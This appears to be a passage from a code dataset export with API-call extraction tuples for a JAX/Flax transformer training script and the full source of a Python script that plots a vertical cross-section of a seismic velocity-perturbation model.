((3566, 3671), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['\"\"\"restore_checkpoints\"\"\"', '(True)', '\"\"\"Whether to restore from existing model checkpoints.\"\"\"'], {}), \"('restore_checkpoints', True,\\n 'Whether to restore from existing model checkpoints.')\\n\", (3583, 3671), False, 'from absl import flags\\n'), ((3687, 3852), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['\"\"\"attention_mask_type\"\"\"', '\"\"\"bos_full_attention\"\"\"', '\"\"\"The kind of attention mask to use. Options are: baseline, bos_to_bos, bos_full_attention\"\"\"'], {}), \"('attention_mask_type', 'bos_full_attention',\\n 'The kind of attention mask to use. Options are: baseline, bos_to_bos, bos_full_attention'\\n )\\n\", (3706, 3852), False, 'from absl import flags\\n'), ((3888, 3990), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['\"\"\"use_relative_attention\"\"\"', '(True)', '\"\"\"Whether to use relative positonal embeddings.\"\"\"'], {}), \"('use_relative_attention', True,\\n 'Whether to use relative positonal embeddings.')\\n\", (3905, 3990), False, 'from absl import flags\\n'), ((4005, 4131), 'absl.flags.DEFINE_bool', 'flags.DEFINE_bool', (['\"\"\"bos_special_attention\"\"\"', '(False)', '\"\"\"Whether to use special relative attention computation for BOS tokens.\"\"\"'], {}), \"('bos_special_attention', False,\\n 'Whether to use special relative attention computation for BOS tokens.')\\n\", (4022, 4131), False, 'from absl import flags\\n'), ((4207, 4296), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['\"\"\"xm_parameters\"\"\"', 'None', '\"\"\"String specifying hyperparamter search.\"\"\"'], {}), \"('xm_parameters', None,\\n 'String specifying hyperparamter search.')\\n\", (4226, 4296), False, 'from absl import flags\\n'), ((7127, 7173), 'flax.training.common_utils.onehot', 'common_utils.onehot', (['targets', 'logits.shape[-1]'], {}), '(targets, logits.shape[-1])\\n', (7146, 7173), False, 'from flax.training import common_utils\\n'), ((8564, 8594), 'jax.lax.psum', 'jax.lax.psum', (['metrics', '\"\"\"batch\"\"\"'], {}), \"(metrics, 'batch')\\n\", (8576, 8594), False, 'import jax\\n'), ((9159, 9188), 'jax.random.split', 'jax.random.split', (['dropout_rng'], {}), '(dropout_rng)\\n', (9175, 9188), False, 'import jax\\n'), ((9719, 9760), 'jax.value_and_grad', 'jax.value_and_grad', (['loss_fn'], {'has_aux': '(True)'}), '(loss_fn, has_aux=True)\\n', (9737, 9760), False, 'import jax\\n'), ((9818, 9846), 'jax.lax.pmean', 'jax.lax.pmean', (['grad', '\"\"\"batch\"\"\"'], {}), \"(grad, 'batch')\\n\", (9831, 9846), False, 'import jax\\n'), ((12015, 12077), 'latent_programmer.decode.flat_batch_beam_expand', 'decode.flat_batch_beam_expand', (['encoded_padding_mask', 'beam_size'], {}), '(encoded_padding_mask, beam_size)\\n', (12044, 12077), False, 'from latent_programmer import decode\\n'), ((13395, 13607), 'latent_programmer.decode.beam_search', 'decode.beam_search', (['inputs', 'cache', 'tokens_ids_to_logits'], {'beam_size': 'beam_size', 'alpha': '(0.6)', 'bos_token': 'config.base_config.bos_token', 'eos_token': 'eos_token', 'max_decode_len': 'max_decode_len', 'slow_decode': 'slow_decode'}), '(inputs, cache, tokens_ids_to_logits, beam_size=beam_size,\\n alpha=0.6, bos_token=config.base_config.bos_token, eos_token=eos_token,\\n max_decode_len=max_decode_len, slow_decode=slow_decode)\\n', (13413, 13607), False, 'from latent_programmer import decode\\n'), ((14514, 14543), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\\n', (14537, 14543), False, 'import collections\\n'), ((14555, 14568), 'jax.devices', 'jax.devices', ([], {}), '()\\n', (14566, 14568), False, 'import jax\\n'), ((15633, 15656), 'tensorflow.compat.v2.enable_v2_behavior', 'tf.enable_v2_behavior', ([], {}), '()\\n', (15654, 15656), True, 'import tensorflow.compat.v2 as tf\\n'), ((15660, 15690), 'tensorflow.compat.v2.random.set_seed', 'tf.random.set_seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\\n', (15678, 15690), True, 'import tensorflow.compat.v2 as tf\\n'), ((15693, 15719), 'numpy.random.seed', 'np.random.seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\\n', (15707, 15719), True, 'import numpy as np\\n'), ((15722, 15745), 'random.seed', 'random.seed', (['FLAGS.seed'], {}), '(FLAGS.seed)\\n', (15733, 15745), False, 'import random\\n'), ((16766, 16790), 'jax.local_device_count', 'jax.local_device_count', ([], {}), '()\\n', (16788, 16790), False, 'import jax\\n'), ((17466, 17497), 'latent_programmer.tasks.robust_fill.tokens.build_token_tables', 'dsl_tokens.build_token_tables', ([], {}), '()\\n', (17495, 17497), True, 'from latent_programmer.tasks.robust_fill import tokens as dsl_tokens\\n'), ((18542, 18579), 'absl.logging.info', 'logging.info', (['\"\"\"Initializing dataset.\"\"\"'], {}), \"('Initializing dataset.')\\n\", (18554, 18579), False, 'from absl import logging\\n'), ((18702, 18768), 'absl.logging.info', 'logging.info', (['\"\"\"Loading dataset from %s\"\"\"', 'FLAGS.dataset_filepattern'], {}), \"('Loading dataset from %s', FLAGS.dataset_filepattern)\\n\", (18714, 18768), False, 'from absl import logging\\n'), ((18837, 18885), 'absl.logging.info', 'logging.info', (['\"\"\"padded_shapes: %s\"\"\"', 'padded_shapes'], {}), \"('padded_shapes: %s', padded_shapes)\\n\", (18849, 18885), False, 'from absl import logging\\n'), ((18898, 19004), 'latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record', 'input_pipeline.create_dataset_from_tf_record', (['FLAGS.dataset_filepattern', 'token_id_table', 'char_id_table'], {}), '(FLAGS.dataset_filepattern,\\n token_id_table, char_id_table)\\n', (18942, 19004), False, 'from latent_programmer.decomposition_transformer_attention import input_pipeline\\n'), ((20156, 20330), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig', 'models.DecomposeAttentionTransformerConfig', ([], {'base_config': 'base_config', 'attention_mask_type': 'FLAGS.attention_mask_type', 'bos_special_attention': 'FLAGS.bos_special_attention'}), '(base_config=base_config,\\n attention_mask_type=FLAGS.attention_mask_type, bos_special_attention=\\n FLAGS.bos_special_attention)\\n', (20198, 20330), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((20897, 20927), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['FLAGS.seed'], {}), '(FLAGS.seed)\\n', (20915, 20927), False, 'import jax\\n'), ((20993, 21014), 'jax.random.split', 'jax.random.split', (['rng'], {}), '(rng)\\n', (21009, 21014), False, 'import jax\\n'), ((21022, 21071), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['eval_config'], {}), '(eval_config)\\n', (21058, 21071), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((21301, 21393), 'flax.optim.Adam', 'optim.Adam', (['FLAGS.lr'], {'beta1': '(0.9)', 'beta2': '(0.98)', 'eps': '(1e-09)', 'weight_decay': 'FLAGS.weight_decay'}), '(FLAGS.lr, beta1=0.9, beta2=0.98, eps=1e-09, weight_decay=FLAGS.\\n weight_decay)\\n', (21311, 21393), False, 'from flax import optim\\n'), ((22201, 22231), 'flax.jax_utils.replicate', 'jax_utils.replicate', (['optimizer'], {}), '(optimizer)\\n', (22220, 22231), False, 'from flax import jax_utils\\n'), ((23679, 23690), 'time.time', 'time.time', ([], {}), '()\\n', (23688, 23690), False, 'import time\\n'), ((30635, 30648), 'absl.app.run', 'app.run', (['main'], {}), '(main)\\n', (30642, 30648), False, 'from absl import app\\n'), ((6479, 6514), 'jax.numpy.asarray', 'jnp.asarray', (['ret'], {'dtype': 'jnp.float32'}), '(ret, dtype=jnp.float32)\\n', (6490, 6514), True, 'import jax.numpy as jnp\\n'), ((7274, 7300), 'jax.numpy.asarray', 'jnp.asarray', (['targets.shape'], {}), '(targets.shape)\\n', (7285, 7300), True, 'import jax.numpy as jnp\\n'), ((8008, 8035), 'jax.numpy.argmax', 'jnp.argmax', (['logits'], {'axis': '(-1)'}), '(logits, axis=-1)\\n', (8018, 8035), True, 'import jax.numpy as jnp\\n'), ((8078, 8104), 'jax.numpy.asarray', 'jnp.asarray', (['targets.shape'], {}), '(targets.shape)\\n', (8089, 8104), True, 'import jax.numpy as jnp\\n'), ((10914, 10935), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['(0)'], {}), '(0)\\n', (10932, 10935), False, 'import jax\\n'), ((10943, 10972), 'jax.numpy.ones', 'jnp.ones', (['inputs.shape', 'dtype'], {}), '(inputs.shape, dtype)\\n', (10951, 10972), True, 'import jax.numpy as jnp\\n'), ((10980, 11010), 'jax.numpy.ones', 'jnp.ones', (['outputs.shape', 'dtype'], {}), '(outputs.shape, dtype)\\n', (10988, 11010), True, 'import jax.numpy as jnp\\n'), ((11018, 11047), 'jax.numpy.ones', 'jnp.ones', (['target_shape', 'dtype'], {}), '(target_shape, dtype)\\n', (11026, 11047), True, 'import jax.numpy as jnp\\n'), ((14867, 14899), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x[0])', 'xs'], {}), '(lambda x: x[0], xs)\\n', (14879, 14899), False, 'import jax\\n'), ((16797, 16810), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (16808, 16810), False, 'import jax\\n'), ((20960, 20973), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (20971, 20973), False, 'import jax\\n'), ((21094, 21109), 'jax.jit', 'jax.jit', (['m.init'], {}), '(m.init)\\n', (21101, 21109), False, 'import jax\\n'), ((21166, 21197), 'jax.numpy.ones', 'jnp.ones', (['io_shape', 'jnp.float32'], {}), '(io_shape, jnp.float32)\\n', (21174, 21197), True, 'import jax.numpy as jnp\\n'), ((21205, 21236), 'jax.numpy.ones', 'jnp.ones', (['io_shape', 'jnp.float32'], {}), '(io_shape, jnp.float32)\\n', (21213, 21236), True, 'import jax.numpy as jnp\\n'), ((21244, 21280), 'jax.numpy.ones', 'jnp.ones', (['program_shape', 'jnp.float32'], {}), '(program_shape, jnp.float32)\\n', (21252, 21280), True, 'import jax.numpy as jnp\\n'), ((21867, 21931), 'absl.logging.info', 'logging.info', (['\"\"\"Found model checkpointed at step %d.\"\"\"', 'start_step'], {}), \"('Found model checkpointed at step %d.', start_step)\\n\", (21879, 21931), False, 'from absl import logging\\n'), ((22670, 22760), 'functools.partial', 'functools.partial', (['train_step'], {'learning_rate_fn': 'learning_rate_fn', 'config': 'train_config'}), '(train_step, learning_rate_fn=learning_rate_fn, config=\\n train_config)\\n', (22687, 22760), False, 'import functools\\n'), ((22845, 22914), 'functools.partial', 'functools.partial', (['eval_step'], {'eos_token': 'eos_token', 'config': 'eval_config'}), '(eval_step, eos_token=eos_token, config=eval_config)\\n', (22862, 22914), False, 'import functools\\n'), ((23022, 23125), 'functools.partial', 'functools.partial', (['initialize_cache'], {'max_decode_len': 'FLAGS.max_program_length', 'config': 'predict_config'}), '(initialize_cache, max_decode_len=FLAGS.max_program_length,\\n config=predict_config)\\n', (23039, 23125), False, 'import functools\\n'), ((23211, 23363), 'functools.partial', 'functools.partial', (['predict_step'], {'eos_token': 'eos_token', 'max_decode_len': 'FLAGS.max_program_length', 'config': 'predict_config', 'slow_decode': 'FLAGS.slow_decode'}), '(predict_step, eos_token=eos_token, max_decode_len=FLAGS.\\n max_program_length, config=predict_config, slow_decode=FLAGS.slow_decode)\\n', (23228, 23363), False, 'import functools\\n'), ((23614, 23638), 'jax.local_device_count', 'jax.local_device_count', ([], {}), '()\\n', (23636, 23638), False, 'import jax\\n'), ((9202, 9231), 'jax.numpy.where', 'jnp.where', (['(programs > 0)', '(1)', '(0)'], {}), '(programs > 0, 1, 0)\\n', (9211, 9231), True, 'import jax.numpy as jnp\\n'), ((10440, 10484), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\\n', (10476, 10484), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((10857, 10901), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\\n', (10893, 10901), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((11936, 11964), 'jax.numpy.where', 'jnp.where', (['(outputs > 0)', '(1)', '(0)'], {}), '(outputs > 0, 1, 0)\\n', (11945, 11964), True, 'import jax.numpy as jnp\\n'), ((14151, 14176), 'numpy.tile', 'np.tile', (['x[-1]', 'tile_dims'], {}), '(x[-1], tile_dims)\\n', (14158, 14176), True, 'import numpy as np\\n'), ((14696, 14716), 'jax.lax.psum', 'jax.lax.psum', (['x', '\"\"\"i\"\"\"'], {}), \"(x, 'i')\\n\", (14708, 14716), False, 'import jax\\n'), ((16873, 16919), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '\"\"\"tb\"\"\"', 'hparam_str'], {}), \"(FLAGS.save_dir, 'tb', hparam_str)\\n\", (16885, 16919), False, 'import os\\n'), ((19322, 19346), 'numpy.ceil', 'np.ceil', (['(batch_size / 10)'], {}), '(batch_size / 10)\\n', (19329, 19346), True, 'import numpy as np\\n'), ((21730, 21785), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '\"\"\"checkpoints\"\"\"', 'hparam_str'], {}), \"(FLAGS.save_dir, 'checkpoints', hparam_str)\\n\", (21742, 21785), False, 'import os\\n'), ((21976, 22092), 'absl.logging.info', 'logging.info', (['\"\"\"Checking that start_step (%s) == finetune_start_step (%s)\"\"\"', 'start_step', 'FLAGS.finetune_start_step'], {}), \"('Checking that start_step (%s) == finetune_start_step (%s)',\\n start_step, FLAGS.finetune_start_step)\\n\", (21988, 22092), False, 'from absl import logging\\n'), ((24500, 24543), 'absl.logging.info', 'logging.info', (['\"\"\"Gathering training metrics.\"\"\"'], {}), \"('Gathering training metrics.')\\n\", (24512, 24543), False, 'from absl import logging\\n'), ((24564, 24601), 'flax.training.common_utils.get_metrics', 'common_utils.get_metrics', (['metrics_all'], {}), '(metrics_all)\\n', (24588, 24601), False, 'from flax.training import common_utils\\n'), ((24674, 24708), 'jax.tree_map', 'jax.tree_map', (['jnp.sum', 'metrics_all'], {}), '(jnp.sum, metrics_all)\\n', (24686, 24708), False, 'import jax\\n'), ((24777, 24830), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x / denominator)', 'metrics_sums'], {}), '(lambda x: x / denominator, metrics_sums)\\n', (24789, 24830), False, 'import jax\\n'), ((25673, 25718), 'absl.logging.info', 'logging.info', (['\"\"\"Gathering evaluation metrics.\"\"\"'], {}), \"('Gathering evaluation metrics.')\\n\", (25685, 25718), False, 'from absl import logging\\n'), ((25746, 25757), 'time.time', 'time.time', ([], {}), '()\\n', (25755, 25757), False, 'import time\\n'), ((26031, 26069), 'flax.training.common_utils.get_metrics', 'common_utils.get_metrics', (['eval_metrics'], {}), '(eval_metrics)\\n', (26055, 26069), False, 'from flax.training import common_utils\\n'), ((26096, 26131), 'jax.tree_map', 'jax.tree_map', (['jnp.sum', 'eval_metrics'], {}), '(jnp.sum, eval_metrics)\\n', (26108, 26131), False, 'import jax\\n'), ((26215, 26278), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x / eval_denominator)', 'eval_metrics_sums'], {}), '(lambda x: x / eval_denominator, eval_metrics_sums)\\n', (26227, 26278), False, 'import jax\\n'), ((26753, 26799), 'absl.logging.info', 'logging.info', (['\"\"\"Gathering beam search metrics.\"\"\"'], {}), \"('Gathering beam search metrics.')\\n\", (26765, 26799), False, 'from absl import logging\\n'), ((7209, 7231), 'flax.linen.log_softmax', 'nn.log_softmax', (['logits'], {}), '(logits)\\n', (7223, 7231), True, 'from flax import linen as nn\\n'), ((9332, 9376), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\\n', (9368, 9376), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((11711, 11755), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\\n', (11747, 11755), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((14794, 14829), 'jax.numpy.broadcast_to', 'jnp.broadcast_to', (['x', '((1,) + x.shape)'], {}), '(x, (1,) + x.shape)\\n', (14810, 14829), True, 'import jax.numpy as jnp\\n'), ((16452, 16483), 'json.loads', 'json.loads', (['FLAGS.xm_parameters'], {}), '(FLAGS.xm_parameters)\\n', (16462, 16483), False, 'import json\\n'), ((24132, 24145), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (24143, 24145), False, 'import jax\\n'), ((25038, 25062), 'jax.numpy.exp', 'jnp.exp', ([\"summary['loss']\"], {}), \"(summary['loss'])\\n\", (25045, 25062), True, 'import jax.numpy as jnp\\n'), ((25087, 25100), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (25098, 25100), False, 'import jax\\n'), ((25115, 25183), 'absl.logging.info', 'logging.info', (['\"\"\"Train in step: %d, loss: %.4f\"\"\"', 'step', \"summary['loss']\"], {}), \"('Train in step: %d, loss: %.4f', step, summary['loss'])\\n\", (25127, 25183), False, 'from absl import logging\\n'), ((25199, 25210), 'time.time', 'time.time', ([], {}), '()\\n', (25208, 25210), False, 'import time\\n'), ((25868, 25895), 'flax.training.common_utils.shard', 'common_utils.shard', (['batches'], {}), '(batches)\\n', (25886, 25895), False, 'from flax.training import common_utils\\n'), ((26348, 26361), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (26359, 26361), False, 'import jax\\n'), ((26871, 26882), 'time.time', 'time.time', ([], {}), '()\\n', (26880, 26882), False, 'import time\\n'), ((5777, 5814), 'jax.numpy.minimum', 'jnp.minimum', (['(1.0)', '(step / warmup_steps)'], {}), '(1.0, step / warmup_steps)\\n', (5788, 5814), True, 'import jax.numpy as jnp\\n'), ((10276, 10361), 'jax.numpy.logical_and', 'jnp.logical_and', (['(programs != config.base_config.bos_token)', '(programs != eos_token)'], {}), '(programs != config.base_config.bos_token, programs != eos_token\\n )\\n', (10291, 10361), True, 'import jax.numpy as jnp\\n'), ((12255, 12306), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', ([], {'config': 'config'}), '(config=config)\\n', (12291, 12306), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((12693, 12744), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', ([], {'config': 'config'}), '(config=config)\\n', (12729, 12744), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\\n'), ((24254, 24309), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '\"\"\"checkpoints\"\"\"', 'hparam_str'], {}), \"(FLAGS.save_dir, 'checkpoints', hparam_str)\\n\", (24266, 24309), False, 'import os\\n'), ((24323, 24355), 'flax.jax_utils.unreplicate', 'jax_utils.unreplicate', (['optimizer'], {}), '(optimizer)\\n', (24344, 24355), False, 'from flax import jax_utils\\n'), ((27557, 27587), 'flax.training.common_utils.shard', 'common_utils.shard', (['pred_batch'], {}), '(pred_batch)\\n', (27575, 27587), False, 'from flax.training import common_utils\\n'), ((29522, 29574), 'jax.tree_map', 'jax.tree_map', (['np.array', '(pred_acc, pred_denominator)'], {}), '(np.array, (pred_acc, pred_denominator))\\n', (29534, 29574), False, 'import jax\\n'), ((29972, 29985), 'jax.host_id', 'jax.host_id', ([], {}), '()\\n', (29983, 29985), False, 'import jax\\n'), ((26458, 26469), 'time.time', 'time.time', ([], {}), '()\\n', (26467, 26469), False, 'import time\\n'), ((28579, 28611), 'absl.logging.info', 'logging.info', (['\"\"\"ios: %s\"\"\"', 'ios[-1]'], {}), \"('ios: %s', ios[-1])\\n\", (28591, 28611), False, 'from absl import logging\\n'), ((28624, 28663), 'absl.logging.info', 'logging.info', (['\"\"\"target: %s\"\"\"', 'targets[-1]'], {}), \"('target: %s', targets[-1])\\n\", (28636, 28663), False, 'from absl import logging\\n'), ((5873, 5910), 'jax.numpy.maximum', 'jnp.maximum', (['(1.0)', '(step - warmup_steps)'], {}), '(1.0, step - warmup_steps)\\n', (5884, 5910), True, 'import jax.numpy as jnp\\n'), ((5972, 5994), 'jax.numpy.sqrt', 'jnp.sqrt', (['warmup_steps'], {}), '(warmup_steps)\\n', (5980, 5994), True, 'import jax.numpy as jnp\\n'), ((18178, 18209), 'numpy.argmax', 'np.argmax', (['(program == eos_token)'], {}), '(program == eos_token)\\n', (18187, 18209), True, 'import numpy as np\\n'), ((30196, 30207), 'time.time', 'time.time', ([], {}), '()\\n', (30205, 30207), False, 'import time\\n'), ((6019, 6050), 'jax.numpy.maximum', 'jnp.maximum', (['step', 'warmup_steps'], {}), '(step, warmup_steps)\\n', (6030, 6050), True, 'import jax.numpy as jnp\\n'), ((27309, 27349), 'numpy.ceil', 'np.ceil', (['(cur_pred_batch_size / n_devices)'], {}), '(cur_pred_batch_size / n_devices)\\n', (27316, 27349), True, 'import numpy as np\\n'), ((6365, 6399), 'jax.numpy.cos', 'jnp.cos', (['(jnp.pi * (progress % 1.0))'], {}), '(jnp.pi * (progress % 1.0))\\n', (6372, 6399), True, 'import jax.numpy as jnp\\n')]"}}},{"rowIdx":798,"cells":{"code":{"kind":"string","value":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport click\nimport numba\n\n\ndef prepare_data(data_pd, parameter):\n lon_set = set(data_pd[\"lon\"])\n lat_set = set(data_pd[\"lat\"])\n dep_set = set(data_pd[\"dep\"])\n\n lon_list = sorted(lon_set)\n lat_list = sorted(lat_set)\n dep_list = sorted(dep_set)\n\n lon_mesh, lat_mesh, dep_mesh = np.meshgrid(\n lon_list, lat_list, dep_list, indexing=\"ij\")\n dx, dy, dz = np.shape(lon_mesh)\n value_mesh = np.zeros_like(lon_mesh)\n x_mesh = np.zeros_like(lon_mesh)\n y_mesh = np.zeros_like(lon_mesh)\n z_mesh = np.zeros_like(lon_mesh)\n r_mesh = np.zeros_like(lon_mesh)\n for i in range(dx):\n for j in range(dy):\n for k in range(dz):\n x_mesh[i, j, k], y_mesh[i, j, k], z_mesh[i, j, k], r_mesh[i, j, k] = lld2xyzr(\n lat_mesh[i, j, k], lon_mesh[i, j, k], dep_mesh[i, j, k])\n\n for index, row in data_pd.iterrows():\n i = int(round((row.lon-lon_list[0])/(lon_list[1]-lon_list[0]), 0))\n j = int(round((row.lat-lat_list[0])/(lat_list[1]-lat_list[0]), 0))\n k = int(round((row.dep-dep_list[0])/(dep_list[1]-dep_list[0]), 0))\n value_mesh[i, j, k] = row[parameter]\n\n return x_mesh, y_mesh, z_mesh, value_mesh\n\n\ndef get_value(data_pd, lat, lon, dep, parameter):\n return data_pd.loc[(data_pd.lat == lat) & (data_pd.lon == lon) & (data_pd.dep == dep)][parameter].values[0]\n\n\n@numba.njit()\ndef lld2xyzr(lat, lon, dep):\n R_EARTH_KM = 6371.0\n r = (R_EARTH_KM-dep)/R_EARTH_KM\n theta = 90-lat\n phi = lon\n\n z = r*cosd(theta)\n h = r*sind(theta)\n x = h*cosd(phi)\n y = h*sind(phi)\n\n return (x, y, z, r)\n\n\n@numba.njit()\ndef cosd(x):\n return np.cos(np.deg2rad(x))\n\n\n@numba.njit()\ndef sind(x):\n return np.sin(np.deg2rad(x))\n\n\n# def get_value_func(x_mesh, y_mesh, z_mesh, value_mesh):\n# value_func = RegularGridInterpolator(\n# (x_mesh, y_mesh, z_mesh), value_mesh, method=\"nearest\")\n# return value_func\n\n\n@numba.njit()\ndef interp_value(lat, lon, dep, x_mesh, y_mesh, z_mesh, value_mesh):\n x, y, z, _ = lld2xyzr(lat, lon, dep)\n distance2 = (x_mesh-x)**2+(y_mesh-y)**2+(z_mesh-z)**2\n mindistance2 = np.min(distance2)\n coors = np.where(distance2 == mindistance2)\n value = value_mesh[coors[0][0], coors[1][0], coors[2][0]]\n return value\n\n\ndef generate_vertical_profile_grids(lon_list, lat_list, dep_list, hnpts, vnpts):\n lons = np.linspace(lon_list[0], lon_list[1], hnpts)\n lats = np.linspace(lat_list[0], lat_list[1], hnpts)\n deps = np.linspace(dep_list[0], dep_list[1], vnpts)\n return lons, lats, deps\n\n\n@click.command()\n@click.option('--lon1', required=True, type=float, help=\"lon1\")\n@click.option('--lon2', required=True, type=float, help=\"lon2\")\n@click.option('--lat1', required=True, type=float, help=\"lat1\")\n@click.option('--lat2', required=True, type=float, help=\"lat2\")\n@click.option('--dep1', required=True, type=float, help=\"dep1\")\n@click.option('--dep2', required=True, type=float, help=\"dep2\")\n@click.option('--data', required=True, type=str, help=\"the pickle file\")\n@click.option('--parameter', required=True, type=str, help=\"physicial parameter to plot\")\n@click.option('--hnpts', required=True, type=int, help=\"horizontal npts\")\n@click.option('--vnpts', required=True, type=int, help=\"vertical npts\")\ndef main(lon1, lon2, lat1, lat2, dep1, dep2, data, parameter, hnpts, vnpts):\n lon_list = [lon1, lon2]\n lat_list = [lat1, lat2]\n dep_list = [dep1, dep2]\n data_pd_raw = pd.read_pickle(data)\n\n # data_pd is too big\n minlon = min(lon1, lon2)\n maxlon = max(lon1, lon2)\n minlat = min(lat1, lat2)\n maxlat = max(lat1, lat2)\n mindep = min(dep1, dep2)\n maxdep = max(dep1, dep2)\n data_pd = data_pd_raw.loc[(data_pd_raw.lat <= maxlat) & (\n data_pd_raw.lat >= minlat) & (data_pd_raw.lon < maxlon) & (data_pd_raw.lon > minlon) & (data_pd_raw.dep >= mindep) & (data_pd_raw.dep <= maxdep)]\n\n x_mesh, y_mesh, z_mesh, value_mesh = prepare_data(data_pd, parameter)\n lons_plot, lats_plot, deps_plot = generate_vertical_profile_grids(\n lon_list, lat_list, dep_list, hnpts, vnpts)\n values = np.zeros((hnpts, vnpts))\n for ih in range(hnpts):\n for iv in range(vnpts):\n values[ih, iv] = interp_value(\n lats_plot[ih], lons_plot[ih], deps_plot[iv], x_mesh, y_mesh, z_mesh, value_mesh)\n # print(lats_plot[ih], lons_plot[ih], deps_plot[iv], values[ih, iv])\n\n # plotting part\n plt.figure()\n mesh_plot_lat, mesh_plot_dep = np.meshgrid(\n lats_plot, deps_plot, indexing=\"ij\")\n\n # get vmin and vmax\n vmin_round = round(np.min(values), 2)\n if(vmin_round < np.min(values)):\n vmin = vmin_round\n else:\n vmin = vmin_round-0.01\n vmax_round = round(np.max(values), 2)\n if(vmax_round > np.max(values)):\n vmax = vmax_round\n else:\n vmax = vmax_round+0.01\n print(vmin, vmax, np.max(values), np.min(values), vmin_round, vmax_round)\n plt.contourf(mesh_plot_lat, mesh_plot_dep,\n values, 101, cmap=plt.cm.seismic_r)\n v = np.arange(vmin, vmax, 0.01)\n plt.colorbar(ticks=v, label=\"perturbation\")\n plt.gca().invert_yaxis()\n plt.xlabel(\n f\"latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)\")\n plt.ylabel(\"depth(km)\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n"},"apis":{"kind":"list like","value":["matplotlib.pyplot.ylabel","numpy.arange","pandas.read_pickle","matplotlib.pyplot.contourf","click.option","numpy.where","matplotlib.pyplot.xlabel","numpy.max","numpy.linspace","numpy.min","numpy.meshgrid","click.command","matplotlib.pyplot.gca","numba.njit","numpy.deg2rad","numpy.shape","matplotlib.pyplot.show","matplotlib.pyplot.colorbar","numpy.zeros","matplotlib.pyplot.figure","numpy.zeros_like"],"string":"[\n \"matplotlib.pyplot.ylabel\",\n \"numpy.arange\",\n \"pandas.read_pickle\",\n \"matplotlib.pyplot.contourf\",\n \"click.option\",\n \"numpy.where\",\n \"matplotlib.pyplot.xlabel\",\n \"numpy.max\",\n \"numpy.linspace\",\n \"numpy.min\",\n \"numpy.meshgrid\",\n \"click.command\",\n \"matplotlib.pyplot.gca\",\n \"numba.njit\",\n \"numpy.deg2rad\",\n \"numpy.shape\",\n \"matplotlib.pyplot.show\",\n \"matplotlib.pyplot.colorbar\",\n \"numpy.zeros\",\n \"matplotlib.pyplot.figure\",\n \"numpy.zeros_like\"\n]"},"extract_api":{"kind":"string","value":"[((1443, 1455), 'numba.njit', 'numba.njit', ([], {}), '()\\n', (1453, 1455), False, 'import numba\\n'), ((1691, 1703), 'numba.njit', 'numba.njit', ([], {}), '()\\n', (1701, 1703), False, 'import numba\\n'), ((1753, 1765), 'numba.njit', 'numba.njit', ([], {}), '()\\n', (1763, 1765), False, 'import numba\\n'), ((2009, 2021), 'numba.njit', 'numba.njit', ([], {}), '()\\n', (2019, 2021), False, 'import numba\\n'), ((2636, 2651), 'click.command', 'click.command', ([], {}), '()\\n', (2649, 2651), False, 'import click\\n'), ((2653, 2715), 'click.option', 'click.option', (['\"\"\"--lon1\"\"\"'], {'required': '(True)', 'type': 'float', 'help': '\"\"\"lon1\"\"\"'}), \"('--lon1', required=True, type=float, help='lon1')\\n\", (2665, 2715), False, 'import click\\n'), ((2717, 2779), 'click.option', 'click.option', (['\"\"\"--lon2\"\"\"'], {'required': '(True)', 'type': 'float', 'help': '\"\"\"lon2\"\"\"'}), \"('--lon2', required=True, type=float, help='lon2')\\n\", (2729, 2779), False, 'import click\\n'), ((2781, 2843), 'click.option', 'click.option', (['\"\"\"--lat1\"\"\"'], {'required': '(True)', 'type': 'float', 'help': '\"\"\"lat1\"\"\"'}), \"('--lat1', required=True, type=float, help='lat1')\\n\", (2793, 2843), False, 'import click\\n'), ((2845, 2907), 'click.option', 'click.option', (['\"\"\"--lat2\"\"\"'], 